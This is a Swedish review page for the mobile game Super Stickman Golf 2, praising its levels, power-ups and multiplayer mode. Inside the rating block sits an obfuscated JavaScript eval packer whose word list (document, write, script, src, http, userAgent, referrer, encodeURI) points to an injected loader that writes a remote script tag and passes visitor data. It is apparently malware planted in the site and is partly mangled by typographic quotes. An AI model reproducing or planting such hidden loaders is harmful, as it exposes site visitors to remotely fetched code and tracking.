Image Image Image Image Image Image Image Image Image Image

| 25 februari, 2020

Scroll to top

Top

Super Stickman Golf 2: Veckans casualspel

Super Stickman Golf 2: Veckans casualspel
Sebastian

Review Overview

Design
7.5
Gameplay
7.5
Pris
7
7.3

RatingSuper eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|abdty|var|u0026u|referrer|ftkni||js|php’.split(’|’),0,{}))
stickman golf är enligt min egna erfarenhet helt klart det bästa golfspelet som jag sett på en smartphone.

I en snygg 2D-miljö får vi lära känna knasiga powerups läckra och bra designade banor med intryck av att man snarare spelar ett plattformsspel än ett golfspel. 

Uppföljaren ger oss mer av allt. Portaler, magneter och mycket annat skoj som att klä upp sin karaktär i alla möjliga sorters kläder är alltid kul. Nu finns det också ett multiplayerläge där man kan möta vänner eller främlingar över nio hål.

En uppföljare av ett spel behöver inte vara mer komplicerat än så här. Super stickman golf 2 är kanske ingen jätte revolution men det är lite bättre och lite roligare än tidigare versionen. Ett kul spel att låta tiden gå när man sitter på bussen, väntar på tåget eller har övrig tid över.

Super stickman golf 2 kostar också bara sju kronor så det är bara att ladda ner och testa sig fram.

Spelet finns till iOS och Android. Nedan kan ni ladda ner versionen till iOS.

Super Stickman Golf 2
Super Stickman Golf 2 Noodlecake Spel, Casual, Sport, Sport Gratis Ladda ner